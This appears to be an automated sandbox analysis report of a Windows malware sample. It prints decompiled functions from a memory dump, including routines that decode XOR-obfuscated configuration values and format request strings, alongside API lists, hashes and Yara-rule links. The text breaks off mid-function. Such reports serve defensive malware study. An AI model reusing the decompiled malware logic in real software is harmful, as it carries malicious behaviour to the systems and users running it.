                                                                                  0x033f6cc4
                                                                                  0x033f6ccf
                                                                                  0x033f6cd6
                                                                                  0x033f6cda
                                                                                  0x033f6ce3
                                                                                  0x033f6ce3
                                                                                  0x033f6cf4
                                                                                  0x033f6cf4
                                                                                  0x033f6d03
                                                                                  0x033f6d09
                                                                                  0x033f6d09
                                                                                  0x033f6d13
                                                                                  0x033f6d13
                                                                                  0x033f6d24
                                                                                  0x033f6d24
                                                                                  0x033f6d32
                                                                                  0x033f6d32
                                                                                  0x033f6d42

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 033F6ABA
                                                                                  • GetTickCount.KERNEL32 ref: 033F6ACE
                                                                                  • wsprintfA.USER32 ref: 033F6B1D
                                                                                  • wsprintfA.USER32 ref: 033F6B3A
                                                                                  • wsprintfA.USER32 ref: 033F6B5B
                                                                                  • wsprintfA.USER32 ref: 033F6B79
                                                                                  • wsprintfA.USER32 ref: 033F6B8E
                                                                                  • wsprintfA.USER32 ref: 033F6BAF
                                                                                  • wsprintfA.USER32 ref: 033F6BE9
                                                                                  • wsprintfA.USER32 ref: 033F6C09
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 033F6C24
                                                                                  • GetTickCount.KERNEL32 ref: 033F6C34
                                                                                  • RtlEnterCriticalSection.NTDLL(05F295F0), ref: 033F6C48
                                                                                  • RtlLeaveCriticalSection.NTDLL(05F295F0), ref: 033F6C66
                                                                                    • Part of subcall function 033F140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1438
                                                                                    • Part of subcall function 033F140D: lstrlen.KERNEL32(00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1440
                                                                                    • Part of subcall function 033F140D: strcpy.NTDLL ref: 033F1457
                                                                                    • Part of subcall function 033F140D: lstrcat.KERNEL32(00000000,00000000), ref: 033F1462
                                                                                    • Part of subcall function 033F140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,033F6C79,?,00000000,033F6C79,00000000,05F29630), ref: 033F147F
                                                                                  • StrTrimA.SHLWAPI(00000000,033FC2C4,00000000,05F29630), ref: 033F6C94
                                                                                    • Part of subcall function 033F74AF: lstrlen.KERNEL32(05F2887A,00000000,00000000,00000000,033F6CA0,00000000), ref: 033F74BF
                                                                                    • Part of subcall function 033F74AF: lstrlen.KERNEL32(?), ref: 033F74C7
                                                                                    • Part of subcall function 033F74AF: lstrcpy.KERNEL32(00000000,05F2887A), ref: 033F74DB
                                                                                    • Part of subcall function 033F74AF: lstrcat.KERNEL32(00000000,?), ref: 033F74E6
                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 033F6CB2
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F6CC0
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F6CC4
                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 033F6CF4
                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 033F6D03
                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,05F29630), ref: 033F6D13
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 033F6D24
                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 033F6D32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1837416118-0
                                                                                  • Opcode ID: 648f3d317277f185035b84fc286d4e9da026f70dea38c1c9040502353cf8d8ac
                                                                                  • Instruction ID: a660ed8e3805d73ce5fe099aabbaa8fbaf35243db57904c7149ae90ef433d75d
                                                                                  • Opcode Fuzzy Hash: 648f3d317277f185035b84fc286d4e9da026f70dea38c1c9040502353cf8d8ac
                                                                                  • Instruction Fuzzy Hash: B4716E72500205BFD761FB68ECCCE5AB7ECFB88314F890525F949C7218D639E9069BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F7D0C, Relevance: 18.1, APIs: 12, Instructions: 102stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 68%
                                                                                  			E033F7D0C(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				WCHAR* _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				WCHAR* _t88;

				_t74 = __ecx;
				_t79 =  *0x33fd2ec; // 0x5f29c48
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E033F2FF4(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x33fc1cc;
				}
				_t44 = E033F4D59(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E033F75C4(lstrlenW(0x33fead8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x33fead8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x33fd230; // 0x2b2a5a8
						_t18 = _t75 + 0x33fead8; // 0x530025
						wsprintfW(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E033F75C4(lstrlenW(0x33febf8) + _a8 + _t57 + _t58 + lstrlenW(0x33febf8) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E033F4C31(_v16);
						} else {
							_t64 =  *0x33fd230; // 0x2b2a5a8
							_t31 = _t64 + 0x33febf8; // 0x73006d
							wsprintfW(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E033F4C31(_v8);
				}
				return _v20;
			}

























                                                                                  0x033f7d0c
                                                                                  0x033f7d14
                                                                                  0x033f7d1a
                                                                                  0x033f7d2a
                                                                                  0x033f7d2d
                                                                                  0x033f7d34
                                                                                  0x033f7d37
                                                                                  0x033f7d39
                                                                                  0x033f7d39
                                                                                  0x033f7d42
                                                                                  0x033f7d49
                                                                                  0x033f7d4c
                                                                                  0x033f7d52
                                                                                  0x033f7d5c
                                                                                  0x033f7d65
                                                                                  0x033f7d6c
                                                                                  0x033f7d7a
                                                                                  0x033f7d8c
                                                                                  0x033f7d93
                                                                                  0x033f7d96
                                                                                  0x033f7d9f
                                                                                  0x033f7db1
                                                                                  0x033f7dbf
                                                                                  0x033f7dc7
                                                                                  0x033f7dcc
                                                                                  0x033f7dcf
                                                                                  0x033f7dda
                                                                                  0x033f7df1
                                                                                  0x033f7df5
                                                                                  0x033f7e28
                                                                                  0x033f7df7
                                                                                  0x033f7dfa
                                                                                  0x033f7e02
                                                                                  0x033f7e0d
                                                                                  0x033f7e15
                                                                                  0x033f7e1d
                                                                                  0x033f7e21
                                                                                  0x033f7e21
                                                                                  0x033f7df5
                                                                                  0x033f7e30
                                                                                  0x033f7e35
                                                                                  0x033f7e3c

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 033F7D21
                                                                                  • lstrlen.KERNEL32(00000000,80000002), ref: 033F7D5C
                                                                                  • lstrlen.KERNEL32(?), ref: 033F7D65
                                                                                  • lstrlen.KERNEL32(00000000), ref: 033F7D6C
                                                                                  • lstrlenW.KERNEL32(80000002), ref: 033F7D7A
                                                                                  • lstrlenW.KERNEL32(033FEAD8), ref: 033F7D83
                                                                                  • wsprintfW.USER32 ref: 033F7DBF
                                                                                  • lstrlen.KERNEL32(?), ref: 033F7DC7
                                                                                  • lstrlen.KERNEL32(?), ref: 033F7DCF
                                                                                  • lstrlenW.KERNEL32(?), ref: 033F7DDA
                                                                                  • lstrlenW.KERNEL32(033FEBF8), ref: 033F7DE3
                                                                                  • wsprintfW.USER32 ref: 033F7E0D
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                                                  • String ID:
                                                                                  • API String ID: 822878831-0
                                                                                  • Opcode ID: 3faed17b759232b041687c5e5fe70b203652f7464d7ae7c1a49faf91d65281d4
                                                                                  • Instruction ID: f8b272ebac6bc5c08d47ac464b3562266e1b2d9cd6080065b5e8c68ea3bfadc4
                                                                                  • Opcode Fuzzy Hash: 3faed17b759232b041687c5e5fe70b203652f7464d7ae7c1a49faf91d65281d4
                                                                                  • Instruction Fuzzy Hash: CC312776D00219BFCF01EFA4CC8499EBBB9EF48358B4540A5EA14A7221DB35DA15EF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F140D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 64%
                                                                                  			E033F140D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x33fd230; // 0x2b2a5a8
				_t1 = _t9 + 0x33fe61b; // 0x253d7325
				_t36 = 0;
				_t28 = E033F5680(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x5f29631
					_t41 = E033F75C4(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E033FA7A2(_t34, _t41, _a8);
						E033F4C31(_t41);
						_t42 = E033F8668(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E033F4C31(_t36);
							_t36 = _t42;
						}
						_t43 = E033F71BA(_t36, _t33);
						if(_t43 != 0) {
							E033F4C31(_t36);
							_t36 = _t43;
						}
					}
					E033F4C31(_t28);
				}
				return _t36;
			}














                                                                                  0x033f140d
                                                                                  0x033f1410
                                                                                  0x033f1411
                                                                                  0x033f1419
                                                                                  0x033f1420
                                                                                  0x033f1427
                                                                                  0x033f142b
                                                                                  0x033f1431
                                                                                  0x033f1438
                                                                                  0x033f143d
                                                                                  0x033f1445
                                                                                  0x033f144f
                                                                                  0x033f1453
                                                                                  0x033f1457
                                                                                  0x033f145d
                                                                                  0x033f1462
                                                                                  0x033f1472
                                                                                  0x033f1474
                                                                                  0x033f148b
                                                                                  0x033f148f
                                                                                  0x033f1492
                                                                                  0x033f1497
                                                                                  0x033f1497
                                                                                  0x033f14a0
                                                                                  0x033f14a4
                                                                                  0x033f14a7
                                                                                  0x033f14ac
                                                                                  0x033f14ac
                                                                                  0x033f14a4
                                                                                  0x033f14af
                                                                                  0x033f14af
                                                                                  0x033f14ba

                                                                                  APIs
                                                                                    • Part of subcall function 033F5680: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,033F1427,253D7325,00000000,00000000,00000000,?,00000000,033F6C79), ref: 033F56E7
                                                                                    • Part of subcall function 033F5680: sprintf.NTDLL ref: 033F5708
                                                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1438
                                                                                  • lstrlen.KERNEL32(00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1440
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • strcpy.NTDLL ref: 033F1457
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F1462
                                                                                    • Part of subcall function 033FA7A2: lstrlen.KERNEL32(00000000,00000000,033F6C79,033F6C79,00000001,00000000,00000000,?,033F1471,00000000,033F6C79,?,00000000,033F6C79,00000000,05F29630), ref: 033FA7B9
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,033F6C79,?,00000000,033F6C79,00000000,05F29630), ref: 033F147F
                                                                                    • Part of subcall function 033F8668: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,033F148B,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F8672
                                                                                    • Part of subcall function 033F8668: _snprintf.NTDLL ref: 033F86D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                  • String ID: =
                                                                                  • API String ID: 2864389247-1428090586
                                                                                  • Opcode ID: 5de6cd45774ae0b6a8f5595660754b7b510d03d4f805bb7dddcbe83ef2a089a6
                                                                                  • Instruction ID: 9ac37eaede968c9c158470b621aa613b074c994f016a6389909d7580e2978a93
                                                                                  • Opcode Fuzzy Hash: 5de6cd45774ae0b6a8f5595660754b7b510d03d4f805bb7dddcbe83ef2a089a6
                                                                                  • Instruction Fuzzy Hash: A8115137E017297F8612FBA59CC4C7F66ADDE85B603895125FB04AF200DE28CD06A7E4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F58CA, Relevance: 9.2, APIs: 6, Instructions: 190memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 90%
                                                                                  			E033F58CA(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0x33fd22c; // 0x63699bc3
				if(E033F33AC( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x33fd280 = _v12;
				}
				_t25 =  *0x33fd22c; // 0x63699bc3
				if(E033F33AC( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0x33fd22c; // 0x63699bc3
						_t31 = E033F1273(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x33fd1f8 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0x33fd22c; // 0x63699bc3
						_t32 = E033F1273(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x33fd1fc = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0x33fd22c; // 0x63699bc3
						_t33 = E033F1273(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x33fd200 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0x33fd22c; // 0x63699bc3
						_t34 = E033F1273(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x33fd004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0x33fd22c; // 0x63699bc3
						_t35 = E033F1273(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x33fd02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0x33fd22c; // 0x63699bc3
						_t36 = E033F1273(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E033F73B3(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E033F10E4();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0x33fd22c; // 0x63699bc3
						_t37 = E033F1273(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E033F73B3(0, _t37) != 0) {
						_t90 =  *0x33fd2dc; // 0x5f29630
						E033F5B10(_t90 + 4, _t42);
					}
					_t38 =  *0x33fd230; // 0x2b2a5a8
					_t18 = _t38 + 0x33fe2d2; // 0x5f2887a
					_t19 = _t38 + 0x33fe7c4; // 0x6976612e
					 *0x33fd27c = _t18;
					 *0x33fd2f4 = _t19;
					HeapFree( *0x33fd1f0, 0, _t74);
					L48:
					return 0;
				}
			}



























                                                                                  0x033f58ca
                                                                                  0x033f58cd
                                                                                  0x033f58ed
                                                                                  0x033f58fb
                                                                                  0x033f58fb
                                                                                  0x033f5900
                                                                                  0x033f591a
                                                                                  0x033f5abd
                                                                                  0x033f5abf
                                                                                  0x00000000
                                                                                  0x033f5920
                                                                                  0x033f5920
                                                                                  0x033f5927
                                                                                  0x033f593d
                                                                                  0x033f5929
                                                                                  0x033f5929
                                                                                  0x033f5936
                                                                                  0x033f5936
                                                                                  0x033f5947
                                                                                  0x033f5949
                                                                                  0x033f5953
                                                                                  0x033f5958
                                                                                  0x033f5958
                                                                                  0x033f5953
                                                                                  0x033f595f
                                                                                  0x033f5975
                                                                                  0x033f5961
                                                                                  0x033f5961
                                                                                  0x033f596e
                                                                                  0x033f596e
                                                                                  0x033f5979
                                                                                  0x033f597b
                                                                                  0x033f5985
                                                                                  0x033f598a
                                                                                  0x033f598a
                                                                                  0x033f5985
                                                                                  0x033f5991
                                                                                  0x033f59a7
                                                                                  0x033f5993
                                                                                  0x033f5993
                                                                                  0x033f59a0
                                                                                  0x033f59a0
                                                                                  0x033f59ab
                                                                                  0x033f59ad
                                                                                  0x033f59b7
                                                                                  0x033f59bc
                                                                                  0x033f59bc
                                                                                  0x033f59b7
                                                                                  0x033f59c3
                                                                                  0x033f59d9
                                                                                  0x033f59c5
                                                                                  0x033f59c5
                                                                                  0x033f59d2
                                                                                  0x033f59d2
                                                                                  0x033f59dd
                                                                                  0x033f59df
                                                                                  0x033f59e9
                                                                                  0x033f59ee
                                                                                  0x033f59ee
                                                                                  0x033f59e9
                                                                                  0x033f59f5
                                                                                  0x033f5a0b
                                                                                  0x033f59f7
                                                                                  0x033f59f7
                                                                                  0x033f5a04
                                                                                  0x033f5a04
                                                                                  0x033f5a0f
                                                                                  0x033f5a11
                                                                                  0x033f5a1b
                                                                                  0x033f5a20
                                                                                  0x033f5a20
                                                                                  0x033f5a1b
                                                                                  0x033f5a27
                                                                                  0x033f5a3d
                                                                                  0x033f5a29
                                                                                  0x033f5a29
                                                                                  0x033f5a36
                                                                                  0x033f5a36
                                                                                  0x033f5a41
                                                                                  0x033f5a43
                                                                                  0x033f5a46
                                                                                  0x033f5a47
                                                                                  0x033f5a4e
                                                                                  0x033f5a50
                                                                                  0x033f5a51
                                                                                  0x033f5a51
                                                                                  0x033f5a4e
                                                                                  0x033f5a58
                                                                                  0x033f5a6e
                                                                                  0x033f5a5a
                                                                                  0x033f5a5a
                                                                                  0x033f5a67
                                                                                  0x033f5a67
                                                                                  0x033f5a72
                                                                                  0x033f5a80
                                                                                  0x033f5a8a
                                                                                  0x033f5a8a
                                                                                  0x033f5a8f
                                                                                  0x033f5a95
                                                                                  0x033f5aa2
                                                                                  0x033f5aa8
                                                                                  0x033f5aae
                                                                                  0x033f5ab3
                                                                                  0x033f5ac0
                                                                                  0x033f5ac4
                                                                                  0x033f5ac4

                                                                                  APIs
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F594F
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F5981
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F59B3
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F59E5
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F5A17
                                                                                  • HeapFree.KERNEL32(00000000,?,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F5AB3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: ae680b7dc42676eaa552b8adc2047e48103ce5a442800ede0f8ad63e414bce4a
                                                                                  • Instruction ID: 58ec5d18c1c4f42310cb9b5b674c4997cdfc666808067ac1da4276a052bf63e4
                                                                                  • Opcode Fuzzy Hash: ae680b7dc42676eaa552b8adc2047e48103ce5a442800ede0f8ad63e414bce4a
                                                                                  • Instruction Fuzzy Hash: C8519375E10205FFEB15EBB8DDC8C5FB7EDEB49240BE80A26A602D7108E630D9019B64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F7A5D, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F7A5D(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x33fd224 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x33fd214 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x33fd210 = _t6;
				 *0x33fd21c = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x33fd20c = _t7;
				if(_t7 == 0) {
					 *0x33fd20c =  *0x33fd20c | 0xffffffff;
				}
				return 0;
			}








                                                                                  0x033f7a65
                                                                                  0x033f7a6d
                                                                                  0x033f7a72
                                                                                  0x00000000
                                                                                  0x033f7abf
                                                                                  0x033f7a74
                                                                                  0x033f7a7c
                                                                                  0x033f7abc
                                                                                  0x00000000
                                                                                  0x033f7abc
                                                                                  0x033f7a7e
                                                                                  0x033f7a83
                                                                                  0x033f7a95
                                                                                  0x033f7a9a
                                                                                  0x033f7aa0
                                                                                  0x033f7aa8
                                                                                  0x033f7aad
                                                                                  0x033f7aaf
                                                                                  0x033f7aaf
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,033F8753,?,?,00000001), ref: 033F7A65
                                                                                  • GetVersion.KERNEL32(?,00000001), ref: 033F7A74
                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001), ref: 033F7A83
                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 033F7AA0
                                                                                  • GetLastError.KERNEL32(?,00000001), ref: 033F7ABF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2270775618-0
                                                                                  • Opcode ID: 1c8f0ae3563a36000db3a0942452a3c36537d2c837de5da65ad608bea2c73178
                                                                                  • Instruction ID: b971bfb8dbe78d7a767139cc17b1a5bc1ad4010849b895d8fb589dfb018ca616
                                                                                  • Opcode Fuzzy Hash: 1c8f0ae3563a36000db3a0942452a3c36537d2c837de5da65ad608bea2c73178
                                                                                  • Instruction Fuzzy Hash: AAF0F470690306BFD710EB38AD8DB183BACE704781F958629E216C52CCE675C2028B64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F14BD, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 46%
                                                                                  			E033F14BD(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x33fd230; // 0x2b2a5a8
					_t5 = _t102 + 0x33fe038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x33fc2c8);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
